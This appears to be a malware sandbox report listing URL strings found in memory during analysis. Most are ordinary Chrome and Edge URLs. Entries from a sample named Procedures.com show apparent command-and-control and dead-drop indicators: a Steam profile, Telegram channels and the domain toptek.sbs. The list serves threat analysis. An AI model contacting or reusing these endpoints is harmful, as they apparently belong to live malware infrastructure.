                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                Source: UKNGDB.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 0000000F.00000003.2581576826.0000327001C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 0000000F.00000003.2581576826.0000327001C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 0000000F.00000003.2581576826.0000327001C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2p
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 0000000F.00000003.2588677175.0000327001F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2589259392.0000327001FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
                Source: chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                Source: chrome.exe, 0000000F.00000003.2534871121.0000007000878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580848332.0000327001040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 0000000F.00000003.2536974657.00003270001C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://m.kugou.com/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://m.soundcloud.com/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://m.vk.com/
                Source: chrome.exe, 0000000F.00000003.2588677175.0000327001F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2589259392.0000327001FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
                Source: msedge.exe, 00000017.00000002.2856509680.00002828024C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000017.00000002.2856509680.00002828024C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: Cookies.26.drString found in binary or memory: https://msn.comXIDv10MU
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://music.amazon.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://music.apple.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://music.yandex.com
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                Source: 000003.log.24.dr, 2cc80dabc69f58b6_0.24.drString found in binary or memory: https://ntp.msn.com
                Source: 000003.log0.24.drString found in binary or memory: https://ntp.msn.com/
                Source: QuotaManager.24.drString found in binary or memory: https://ntp.msn.com/_default
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                Source: Session_13379405062517659.24.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                Source: QuotaManager.24.dr, QuotaManager-journal.24.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: 2cc80dabc69f58b6_0.24.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                Source: msedge.exe, 00000017.00000002.2856509680.00002828024C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 0000000F.00000003.2589259392.0000327001FDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://open.spotify.com
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.live.com/mail/0/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.office.com/mail/0/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://sb.scorecardresearch.com/
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://srtb.msn.cn/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://srtb.msn.com/
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2588677175.0000327001F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2589259392.0000327001FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Procedures.com, 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Procedures.com, 0000000B.00000003.2364719873.0000000001475000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001445000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364568713.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363944038.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364317456.000000000145C000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363974153.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Procedures.com, 0000000B.00000003.2364719873.0000000001475000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001445000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364568713.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363944038.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364317456.000000000145C000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363974153.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Procedures.com, 0000000B.00000002.3152315599.0000000001482000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.0000000003FFD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/l
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://tidal.com/
                Source: Procedures.com, 0000000B.00000002.3157816062.0000000003FFD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs
                Source: Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/
                Source: Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/Q
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsBVWXYZ1234567890isposition:
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000402C000.00000040.00001000.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.000000000414F000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsosh;
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://twitter.com/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://vibe.naver.com/today
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                Source: Procedures.com, 0000000B.00000002.3152315599.0000000001482000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.0000000003FFD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://web.telegram.org/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://web.whatsapp.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.deezer.com/
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, P8Q1VA.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 0000000F.00000003.2550296822.0000327000E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: content.js.24.dr, content_new.js.24.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 0000000F.00000003.2549336556.0000327000F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2579210853.0000327000F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 0000000F.00000003.2549336556.0000327000F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2579210853.0000327000F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
